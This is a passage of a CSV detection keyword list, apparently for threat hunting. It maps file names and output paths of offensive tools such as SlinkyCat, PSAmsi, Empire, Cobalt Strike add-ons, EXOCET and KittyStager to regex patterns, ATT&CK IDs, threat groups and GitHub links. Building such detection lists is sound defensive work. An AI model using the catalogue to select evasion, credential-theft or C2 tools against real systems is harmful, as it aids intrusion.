Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/SharpHide*",".{0,1000}outflanknl\/SharpHide.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*outflanknl/Spray-AD*",".{0,1000}outflanknl\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*outflanknl/WdToggle*",".{0,1000}outflanknl\/WdToggle.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*Outflank-Recon-AD*",".{0,1000}Outflank\-Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*OutlookEmailAbuse.ps1*",".{0,1000}OutlookEmailAbuse\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-PasteBin.ps1*",".{0,1000}Out\-PasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Output malware sample selected: *",".{0,1000}Output\smalware\ssample\sselected\:\s.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*output*kitten.exe*",".{0,1000}output.{0,1000}kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Output.aes.zip*",".{0,1000}Output\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*output/AccountsWithSPN.txt*",".{0,1000}output\/AccountsWithSPN\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AdminAccessComputers.txt*",".{0,1000}output\/AdminAccessComputers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainControllers.txt*",".{0,1000}output\/AllDomainControllers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainGroups.txt*",".{0,1000}output\/AllDomainGroups\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainHosts.txt*",".{0,1000}output\/AllDomainHosts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainUserAccounts.txt*",".{0,1000}output\/AllDomainUserAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainUsers.txt*",".{0,1000}output\/AllDomainUsers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers.txt*",".{0,1000}output\/AllServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k12.txt*",".{0,1000}output\/AllServers2k12\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k16.txt*",".{0,1000}output\/AllServers2k16\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k19.txt*",".{0,1000}output\/AllServers2k19\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k22.txt*",".{0,1000}output\/AllServers2k22\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k8.txt*",".{0,1000}output\/AllServers2k8\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllTrusts.txt*",".{0,1000}output\/AllTrusts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/CompletedDescriptionField.txt*",".{0,1000}output\/CompletedDescriptionField\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DescriptionContainsPass.txt*",".{0,1000}output\/DescriptionContainsPass\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DNETAccountsByDescription.txt*",".{0,1000}output\/DNETAccountsByDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainAdmins.txt*",".{0,1000}output\/DomainAdmins\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainGroupsLocalAdmin.txt*",".{0,1000}output\/DomainGroupsLocalAdmin\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainUserAccountsWithCompletedADDescription.txt*",".{0,1000}output\/DomainUserAccountsWithCompletedADDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/ExchangeServers.txt*",".{0,1000}output\/ExchangeServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/html/data/beacons.json*",".{0,1000}output\/html\/data\/beacons\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*output/NeverLoggedInAccounts.txt*",".{0,1000}output\/NeverLoggedInAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/NonDCWindows10Computers.txt*",".{0,1000}output\/NonDCWindows10Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/NonDCWindows11Computers.txt*",".{0,1000}output\/NonDCWindows11Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/NonDCWindows7Computers.txt*",".{0,1000}output\/NonDCWindows7Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/PasswordNeverExpire.txt*",".{0,1000}output\/PasswordNeverExpire\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/payloads/*",".{0,1000}output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*output/RatChatPT_unix*",".{0,1000}output\/RatChatPT_unix.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*output/RDPMachines.txt*",".{0,1000}output\/RDPMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersInDomainAdminsGroup.txt*",".{0,1000}output\/UsersInDomainAdminsGroup\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersLastPasswordChange.txt*",".{0,1000}output\/UsersLastPasswordChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersNoPasswordRequired.txt*",".{0,1000}output\/UsersNoPasswordRequired\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersPasswordMustChange.txt*",".{0,1000}output\/UsersPasswordMustChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersPasswordNotChanged.txt*",".{0,1000}output\/UsersPasswordNotChanged\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/WinRMMachines.txt*",".{0,1000}output\/WinRMMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output: link.bin*",".{0,1000}output\:\slink\.bin.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","false positives expected !","4","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*output: link.dll*",".{0,1000}output\:\slink\.dll.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 